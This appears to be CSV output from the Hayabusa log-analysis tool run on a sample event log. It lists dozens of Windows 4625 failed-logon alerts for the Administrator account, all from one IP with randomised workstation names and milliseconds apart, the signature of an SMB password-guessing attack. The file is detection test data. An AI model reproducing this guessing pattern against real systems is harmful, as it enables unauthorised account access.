2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
